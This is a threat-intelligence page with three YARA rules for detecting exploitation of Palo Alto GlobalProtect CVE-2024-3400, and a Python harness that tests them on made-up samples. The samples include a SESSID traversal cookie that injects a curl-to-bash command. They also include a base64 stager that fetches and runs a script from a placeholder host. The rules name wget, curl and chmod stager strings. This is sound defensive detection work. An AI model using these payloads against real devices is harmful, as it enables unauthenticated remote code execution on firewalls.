
YARA rules for CVE-2024-3400

3 rules · scoped to CVE-2024-3400
YARA rules whose family, name, or description matches this CVE or its tooling. Use them for pattern hunts over files and exported artefacts rather than compiled binaries: the strings below target the traversal payload carried in the SESSID cookie, PAN-OS log and telemetry paths under /opt/panlogs and /var/appweb, a dropped root cron line, and base64-encoded shell stagers, so the inputs to scan are captured web/proxy logs, device log exports and recovered scripts.

YARA rules

3 of 3
Match: direct · Tag: UTA028
APT_UTA028_ForensicArtefacts_PaloAlto_CVE_2024_3400_Apr24_1
Detects forensic artefacts of APT UTA028 as found in a campaign exploiting the Palo Alto CVE-2024-3400 vulnerability
Author: Florian Roth · License: see source repo
rule APT_UTA028_ForensicArtefacts_PaloAlto_CVE_2024_3400_Apr24_1 : SCRIPT {
   meta:
      description = "Detects forensic artefacts of APT UTA028 as found in a campaign exploiting the Palo Alto CVE-2024-3400 vulnerability"
      author = "Florian Roth"
      reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
      date = "2024-04-15"
      modified = "2024-04-18"
      score = 70
      id = "32cf18ff-784d-5849-87f8-14ede7315188"
   strings:
      $x1 = "cmd = base64.b64decode(rst.group"
      $x2 = "f.write(\"/*\"+output+\"*/\")"

      $x3 = "* * * * * root wget -qO- http://"
      $x4 = "rm -f /var/appweb/sslvpndocs/global-protect/*.css"

      $x5a = "failed to unmarshal session(../" // https://security.paloaltonetworks.com/CVE-2024-3400
      $x5b = "failed to unmarshal session(./../" // customer data

      $x6 = "rm -rf /opt/panlogs/tmp/device_telemetry/minute/*" base64
      $x7 = "$(uname -a) > /var/" base64
   condition:
      1 of them
}
Match: direct · Tag: PaloAlto
EXPL_PaloAlto_CVE_2024_3400_Apr24_1
Detects characteristics of the exploit code used in attacks against Palo Alto GlobalProtect CVE-2024-3400
Author: Florian Roth · License: see source repo
rule EXPL_PaloAlto_CVE_2024_3400_Apr24_1 {
   meta:
      description = "Detects characteristics of the exploit code used in attacks against Palo Alto GlobalProtect CVE-2024-3400"
      author = "Florian Roth"
      reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
      date = "2024-04-15"
      score = 70
      id = "1bcf0415-5351-5e09-ab93-496e8dc47c92"
   strings:
      $x1 = "SESSID=../../../../opt/panlogs/"
      $x2 = "SESSID=./../../../../opt/panlogs/"
      
      $sa1 = "SESSID=../../../../"
      $sa2 = "SESSID=./../../../../"
      
      $sb2 = "${IFS}"
   condition:
      1 of ($x*)
      or (1 of ($sa*) and $sb2)
}
Match: direct · Tag: LNX
SUSP_LNX_Base64_Exec_Apr24
Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)
Author: Christian Burkard · License: see source repo
rule SUSP_LNX_Base64_Exec_Apr24 : SCRIPT {
   meta:
      description = "Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)"
      author = "Christian Burkard"
      date = "2024-04-18"
      modified = "2025-03-21"
      reference = "Internal Research"
      score = 75
      id = "2da3d050-86b0-5903-97eb-c5f39ce4f3a3"
   strings:
      $s1 = "curl http://" base64
      $s2 = "wget http://" base64
      $s3 = ";chmod 777 " base64
      // $s4 = "/tmp/" base64 // prone to FPs
      
      $mirai = "country="

      $fp1 = "<html"
      $fp2 = "<?xml"
   condition:
      filesize < 800KB
      and 1 of ($s*) 
      and not $mirai
      and not 1 of ($fp*)
}
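To see how the three rules above interact on realistic artefacts, here is a stand-alone harness added to this page; it is not code from the rules' source repository or from their authors. It re-expresses each rule's strings and condition in Python and runs them over constructed samples (a cookie line, a base64 stager, a GlobalProtect log line, an HTML false-positive case and a traversal-only cookie; the attacker host 203.0.113.5 is an RFC 5737 documentation address). The `yara_base64_variants` helper reproduces what YARA's `base64` string modifier is documented to search for (encode the string with 0, 1 and 2 leading pad bytes, then drop the boundary characters whose bits depend on data outside the string); that trimming is my reading of the documented behaviour and is an assumption, so for production hunts compile the rules with real YARA.

```python
from __future__ import annotations

import base64

# Constructed samples, not real captures.
SAMPLE_COOKIE = (b"Cookie: SESSID=./../../../../opt/panlogs/tmp/device_telemetry/minute/"
                 b"x`curl${IFS}http://203.0.113.5/x.sh|bash`\r\n")
SAMPLE_STAGER = (b"echo " + base64.b64encode(b"Xcurl http://203.0.113.5/a.sh|sh")
                 + b" | base64 -d | sh\n")           # 'curl http://' sits at alignment 1
SAMPLE_LOG = b"failed to unmarshal session(../../../../opt/panlogs/tmp/device_telemetry/minute/x)\n"
SAMPLE_HTML_FP = b"<html><body>d2dldCBodHRwOi8v</body></html>\n"   # base64 of 'wget http://'
SAMPLE_TRAVERSAL_ONLY = b"Cookie: SESSID=../../../../etc/passwd\n"


def yara_base64_variants(s: bytes) -> list[bytes]:
    """The three alignments YARA searches for with the `base64` modifier (assumed from
    the documented behaviour: 0/1/2 leading pad bytes, boundary chars dropped)."""
    variants = []
    for offset in range(3):
        enc = base64.b64encode(b"\x00" * offset + s).rstrip(b"=")
        lead = (0, 2, 3)[offset]                          # chars that depend on the pad bytes
        tail = 0 if (offset + len(s)) % 3 == 0 else 1     # char that mixes in the next byte
        variants.append(enc[lead:len(enc) - tail])
    return variants


def contains(data: bytes, s: bytes, b64: bool = False) -> bool:
    """Case-sensitive substring test, like a plain YARA text string."""
    needles = yara_base64_variants(s) if b64 else [s]
    return any(n in data for n in needles)


def rule_apt_uta028_forensic_artefacts(data: bytes) -> bool:
    """APT_UTA028_ForensicArtefacts_PaloAlto_CVE_2024_3400_Apr24_1: condition '1 of them'."""
    plain = [
        b"cmd = base64.b64decode(rst.group",
        b'f.write("/*"+output+"*/")',
        b"* * * * * root wget -qO- http://",
        b"rm -f /var/appweb/sslvpndocs/global-protect/*.css",
        b"failed to unmarshal session(../",
        b"failed to unmarshal session(./../",
    ]
    encoded = [b"rm -rf /opt/panlogs/tmp/device_telemetry/minute/*", b"$(uname -a) > /var/"]
    return any(contains(data, s) for s in plain) or any(contains(data, s, True) for s in encoded)


def rule_expl_paloalto(data: bytes) -> bool:
    """EXPL_PaloAlto_CVE_2024_3400_Apr24_1: '1 of ($x*) or (1 of ($sa*) and $sb2)'."""
    x = [b"SESSID=../../../../opt/panlogs/", b"SESSID=./../../../../opt/panlogs/"]
    sa = [b"SESSID=../../../../", b"SESSID=./../../../../"]
    return any(contains(data, s) for s in x) or (
        any(contains(data, s) for s in sa) and contains(data, b"${IFS}"))


def rule_susp_lnx_base64_exec(data: bytes) -> bool:
    """SUSP_LNX_Base64_Exec_Apr24: size cap, one encoded command, two FP guards."""
    if len(data) >= 800 * 1024:                          # YARA's KB suffix means 1024 bytes
        return False
    cmds = [b"curl http://", b"wget http://", b";chmod 777 "]
    return (any(contains(data, c, True) for c in cmds)
            and not contains(data, b"country=")          # $mirai
            and not any(contains(data, fp) for fp in (b"<html", b"<?xml")))


RULES = {
    "APT_UTA028_ForensicArtefacts_PaloAlto_CVE_2024_3400_Apr24_1": rule_apt_uta028_forensic_artefacts,
    "EXPL_PaloAlto_CVE_2024_3400_Apr24_1": rule_expl_paloalto,
    "SUSP_LNX_Base64_Exec_Apr24": rule_susp_lnx_base64_exec,
}


def scan(data: bytes) -> list[str]:
    """Names of the rules that fire on one artefact, in the page's order."""
    return [name for name, rule in RULES.items() if rule(data)]


if __name__ == "__main__":
    for label, sample in [("cookie", SAMPLE_COOKIE), ("stager", SAMPLE_STAGER),
                          ("log", SAMPLE_LOG), ("html-fp", SAMPLE_HTML_FP),
                          ("traversal-only", SAMPLE_TRAVERSAL_ONLY)]:
        print(f"{label:15} -> {scan(sample)}")
```

Two behaviours are worth noticing: the traversal-only cookie does not fire EXPL_PaloAlto_CVE_2024_3400_Apr24_1 because the weaker `$sa*` strings are only accepted together with `${IFS}`, and the stager is still caught although `curl http://` does not start on a 3-byte boundary, which is exactly what the `base64` modifier buys you. With the real tool the equivalent run is `yara -r rules.yar <exported-artefacts-dir>`.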
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin